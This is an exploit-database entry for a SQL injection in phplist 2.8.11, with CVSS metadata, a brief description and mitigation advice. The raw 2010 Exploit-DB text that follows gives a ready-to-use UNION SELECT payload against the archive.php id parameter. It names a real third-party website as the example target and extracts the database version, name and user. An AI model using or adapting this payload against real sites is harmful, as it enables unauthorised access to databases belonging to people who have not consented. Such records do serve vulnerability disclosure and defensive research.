phplist version 2.8.11 SQL Injection Vulnerability

vendor:

phplist

by:

d3v1l [Avram Marius]

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: phplist

Affected Version From: 2.8.11

Affected Version To: 2.8.11

Patch Exists: NO

Related CWE: N/A

CPE: a:phplist:phplist:2.8.11

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

phplist version 2.8.11 SQL Injection Vulnerability

A SQL injection vulnerability exists in phplist version 2.8.11. An attacker can exploit this vulnerability to gain access to sensitive information such as version, database, and user information by sending a specially crafted HTTP request to the vulnerable application.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Additionally, the application should be configured to use parameterized queries.

Source

Exploit-DB raw data:

[~]----------------------------------------------------------------------------------------------------------------------- 
[~] phplist version 2.8.11 SQL Injection Vulnerability 
[~] 
[~] http://www.phplist.com/ 
[~] 
[~] 
[~] ---------------------------------------------------------------------------------------------------------------------- 
[~] Bug founded by d3v1l [Avram Marius] 
[~] 
[~] Date: 08.05.2010 
[~] 
[~] 
[~] http://security-sh3ll.blogspot.com 
[~] 
[~] ---------------------------------------------------------------------------------------------------------------------- 
[~] newmail/archive.php?id= SQL 
[~] 
[~] 
[~] Ex - The Information Security Writers Newsletter - website
[~] 
[~] http://[site]/newmail/archive.php?id= 
[~]
[~] http://www.infosecwriters.com/newmail/archive.php?id=-1 UNION SELECT 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19/* 
[~]------------------------------------------------------------------------------------------------------------------------